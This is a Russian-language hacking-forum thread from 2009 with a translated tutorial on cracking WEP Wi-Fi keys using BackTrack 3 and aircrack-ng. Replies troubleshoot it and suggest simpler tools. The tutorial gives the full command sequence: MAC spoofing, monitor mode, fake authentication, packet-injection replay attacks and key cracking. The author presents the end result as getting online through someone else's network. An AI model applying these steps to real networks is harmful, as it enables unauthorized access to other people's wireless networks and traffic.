Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Беспроводные технологии/WPAN/WLAN (https://forum.antichat.xyz/forumdisplay.php?f=113)
-   -   Взлом WEP с помощью BactTrack 3 (https://forum.antichat.xyz/showthread.php?t=107039)

jawbreaker 19.02.2009 20:32

Взлом WEP с помощью BactTrack 3
 
Для взлома WEP ключа нам понадобится:
- BactTrack 3
- подходящий wifi адаптер(список).
- Точка доступа с WEP-шифрованием
- Базовое знание терминов

.::Подготовка WIFI адаптера::.
Способ #1:
Набираем в консоли:
Код:

iwconfig
. В ответ будет что-то вроде:
Код:

bt ~ # iwconfig
lo no wireless extensions.

wifi0 no wireless extensions.

ath0 IEEE 802.11g ESSID:"homenet" Nickname:""
Mode:Managed Frequency:2.437 GHz Access Point: 00:17:9A:26:8C:0E
Bit Rate:18 Mb/s Tx-Power:15 dBm Sensitivity=1/1
Retryff RTS thrff Fragment thrff
Encryption key:1234-5678-99 Security modepen
Power Managementff
Link Quality=18/70 Signal level=-78 dBm Noise level=-96 dBm
Rx invalid nwid:5601 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0

Как видим, карточка находится в управляемом режиме -
чтобы взломать сеть нужно перевести её в режим мониторинга. Для этого пишем:
Код:

wlanconfig ath1 create wlandev wifi0 wlanmode monitor
Всё, осталось сменить mac-адрес и можно переходить к следующему этапу, подставляя вместо [device] и [interface] ath1.

Способ #2:
Код:

iwconfig
Выдаст вам имя интерфейса беспроводного адаптера. Затем нужно остановить адаптер:
Код:

airmon-ng stop [device]
Затем:
Код:

ifconfig down [interface]
Теперь нужно поменять MAC адрес адаптера:
Код:

macchanger --mac 00:11:22:33:44:66 [device]
Настало время запустить адаптер в режиме мониторинга:
Код:

airmon-ng start [device]
http://thew0rd.com/wp-content/galler...n-ngstart1.png
.::Атакуем цель::.
Ищем сеть с WEP шифрованием командой:
Код:

airodump-ng [device]
http://thew0rd.com/wp-content/galler...odumpwifi0.png
Запишите MAC адрес сети(BSSID) ключ которой хотите найти , канал (CH) и имя (ESSID). Теперь нужно начинать собирать данные с точки доступа сети для атаки:
Код:

airodump-ng -c [channel] -w [network.out] –bssid [bssid] [device]
http://thew0rd.com/wp-content/galler...dumpoutput.png
Эта команда выведет данные в файл network.out. Затем нужно скормить этот файл другой программе и золотой ключик наш ;) .

Откройте другую консоль (оставив эту работать). Теперь нужно сгенерить поддельные пакеты чтобы заставить точку доступа передавать больше данных необходимых для поиска ключа. Протестируйте точку доступа следующей командой:
Код:

aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:66 -e [essid] [device]
http://thew0rd.com/wp-content/galler...ayfakeauth.png
Если всё прошло успешно можно начинать генерировать множество пакетов чтобы взломать WEP ключ:
Код:

aireplay-ng -3 -b [bssid] -h 00:11:22:33:44:66 [device]
http://thew0rd.com/wp-content/galler...enerateivs.png

Это заставит точку доступа передать множество пакетов которые мы будем использовать для взлома ключа. Переключитесь на airodump-ng работающий в другой консоли и вы увидите как число "data" пакетов растет со временем.

http://thew0rd.com/wp-content/galler...ptureivs_0.png

После того как количество пакетов достигнет 10000-20000 (чем больше пакетов тем быстрее будет найден ключ) можно запускать aircrack.
Если не получается получить от точки доступа пакеты вышеописанным способом попробуйте ввести:
Код:

aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h 00:11:22:33:44:66 [device]
http://thew0rd.com/wp-content/galler...ayattack2p.png

Теперь, когда вы собрали достаточное количество пакетов для взлома можно приступать собственно к взлому:
Код:

aircrack-ng -n 128 -b [bssid] [filename]-01.cap
-n указывает на то что ключ 128ми битный (может быть 64 битным).
http://thew0rd.com/wp-content/galler...ck/crackng.png
Всё, ключ найден можно выходить в интернет с помощью чужой сети ;)

Источник

Переведено и дополнено jawbreaker специально для Античат.ру!

mikhoni 20.02.2009 01:40

на самом деле я вызываю
aircrack-ng *.cap
и не парюсь, да и для вепа можно параметр -i поставить, тогда собирать будет только ключи инициализации (IVs) файлы тогда будут сохраняться как *.ivs

XENON4IK 20.02.2009 02:58

Люди явно отстают от жизни))) ставим spoonwep2 и весь взлом упрощается до неузноваемости) пару кликов и через 5 минут у тебя уже ключик) конечно иногда попадаются такие сети где без рук не обойтись, но это редкость))

Black.Cat 28.02.2009 22:53

ifconfig down [interface] - что должно быть вместо [interface]?

svesve 28.02.2009 23:17

Цитата:

Сообщение от Black.Cat
ifconfig down [interface] - что должно быть вместо [interface]?

название твоего сетевого интерфейса

в случае с wi-fi ath0
в случае с ethrnet eth0

Black.Cat 01.03.2009 00:18

У меня карта Intel, вместо [device] писал wlan0.. Помоему карты Atheros определяются как ath0 ?..

karlsn 05.03.2009 03:15

2 способа нагона пакетов не срабатывают ... Это из за чего может быть ? адаптер Edimax EW-7318USG

karlsn 05.03.2009 03:20

http://img65.imageshack.us/img65/1223/ss1.jpg

http://img258.imageshack.us/img258/8826/ss3.jpg


http://img527.imageshack.us/img527/8169/ss2x.jpg

Stradi 06.03.2009 20:58

Основная проблема в том, что сначала нужно провести фейковую авторизацию, а потом нагонять пакеты.

karlsn 06.03.2009 23:23

хмммм... может на AP стоит mac фильтр , хотя я на 3 точки генил.
карта моожет ешё .... :confused:


Время: 22:19